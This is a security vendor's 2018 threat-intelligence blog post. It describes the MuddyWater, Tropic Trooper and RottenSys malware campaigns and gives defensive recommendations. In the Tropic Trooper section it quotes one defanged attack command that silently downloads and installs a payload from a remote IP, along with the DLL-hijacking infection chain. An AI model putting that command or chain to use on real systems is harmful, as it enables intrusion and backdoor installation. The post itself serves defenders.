TOP MIDDLE EAST CYBER THREATS-29 MARCH 2018

At Help AG, our Managed Security Services (MSS) team offers 24x7x365 monitoring of complex IT security infrastructures for some of the largest enterprises in the region. As a result of this, we have our eyes keenly fixed on the cyber security threat landscape and are among the first in the region to learn and act upon new threats.
In this blog, I share the top three cyber security threats that our MSS team has recently come across. So, read on to learn about what you need to look out for in the weeks ahead:

 Muddy Water Campaign Targets the Middle East

A new version of the Muddy water campaign has been targeting Turkey, Pakistan, Tajikistan and Middle East countries. The first Muddy water campaign was executed in November 2017 and was reported by the Saudi government’s National Cyber Security Centre.
According to threat intelligence, macro enabled malicious documents are being sent via email to the targeted users. These emails utilize the logos of local governments to fake authenticity, thereby luring users to read the attachments. Clicking on the attached documents downloads a visual basic file which in turn runs a PowerShell script which tries to communicate to external Command & Control (C&C) servers. The script tries to fetch the operating system name, architecture, domain, network adapter configuration, and username and encrypts the message using a simple RSA algorithm before sending it to external servers.

Our Recommendations:

• Monitor the execution of uncommon PowerShell/VB scripts at the end user’s machine.
• Email is used as an entry point, so it is important to ensure proper controls are in place to scan inbound emails, such as the usage of sandbox technology to scan incoming emails
• Educate users to avoid opening unexpected emails and report to IT security if any unexpected email arrives
• Limit the provision of administrator privilege access to end-users’ machines
• Ensure AV at endpoints is being properly and regularly updates. It is also worth checking whether your AV has signature for all the hashes.

The Indicators of Compromise (IOCs) for this attack are available at:
https://blog.trendmicro.com/trendlabs-security-intelligence/campaign-possibly-connected-muddywater-surfaces-middle-east-central-asia/

Tropic Trooper Group Targets Eastern Asia

We came across a new campaign named Tropic Trooper (also known as Key Boy), which is targeting Taiwan, Philippine, and Hong Kong, focusing on their government, healthcare, transportation, and high-tech industries. The group, which has been active since at least 2011, is known to be very organized and believed to be developing their own cyberespionage tools, so as to gain and maintain a foothold in the targeted network.
According to threat intelligence we received, to infiltrate target networks, the group relies on crafty social engineering tricks. They use contextually relevant subject, content, and aptly named exploit-laden Microsoft Office attachments such as “Statement” to convince chosen recipients to download and open the files supposedly sent for review.
Once the user opens the malicious attachment, the flaws CVE-2017-11882 or CVE-2018-0802 of Microsoft Office’s equation Editor are exploited by executing a command. An installer package (.msi) is downloaded and installed with command (/c msiexec /q /i [hxxp://61[.]216[.]5[.]24/in.sys]). This system configuration file (in.sys) will drop a backdoor installer (UserInstall.exe), which in turn will drop a normal sidebar.exe file , a malicious loader (in “C:\ProgramData\Apple\Update\wab32res.dll“), and an encrypted configuration file. The malicious loader will use dynamic-link library (DLL) hijacking to inject malicious code into a process of a file/application on sidebar.exe and launch dllhost.exe . The loader will then inject a DLL backdoor into dllhost.exe, which in-turn will load the encrypted configuration file and decrypt it, then use Secure Sockets Layer (SSL) protocol to connect to C&C servers.

Our Recommendations:

In addition to following all the recommendations made in the case of the Muddy Water campaign above, we would advise the following:

• Keep the systems, its applications, and the network updated. The vulnerabilities for Tropic Trooper’s campaigns have been patched lastJanuary by Microsoft.
• Ensure, all software updates are pushed from an authorized server(SCCM)
• Employingnetwork segmentation and categorization deter lateral movement and mitigate further exposure.
• Application control can block suspicious files and anomalous routines from being installed or executed in the system.
• Disable orsecure the use of system administration tools such as PowerShell and other command-line tools that may be abused.

The Indicators of Compromise (IOCs) for this attack are available at https://blog.trendmicro.com/trendlabs-security-intelligence/tropic-trooper-new-strategy/

Pre-Installed Android Malware Infects over 5 Million Devices Worldwide

Whether your organization has made a strategic decision to support it or not, employees are utilizing their personal smart devices for both personal and professional reasons. As a result, the recently uncovered RottenSys malware is a concern for all organizations.
Disguised as a ‘System Wi-Fi service’ app, this malware is observed to be pre-installed on millions of brand new smartphones from top manufacturers that include Honor, Huawei, Xiaomi, OPPO, Vivo, Samsung and GIONEE. Its obvious that attackers have managed to implant this malware somewhere along the supply chain.
RottenSys evades detection as it only downloads its malicious component in a later phase. To do this, it exploits the “DOWNLOAD_WITHOUT_NOTIFICATION” permission so as to circumvent any user interaction.
The motive of the attack? Currently, this massive malware campaign pushes adware to all infected devices that aggressively displays advertisements on the device’s home screen, as pop-up windows or full-screen ads to generate fraudulent ad-revenues.
The capabilities extend beyond those however as some infected devices have been found installing a new RottenSys component that gives attackers more extensive abilities, including silently installing additional apps and UI automation.
As always, at Help AG, we’re here to protect your organization against these any other cyber threats so please reach out to us for all your cyber security needs.
Blog By:
Ben Abraham, Senior Security Analyst at Help AG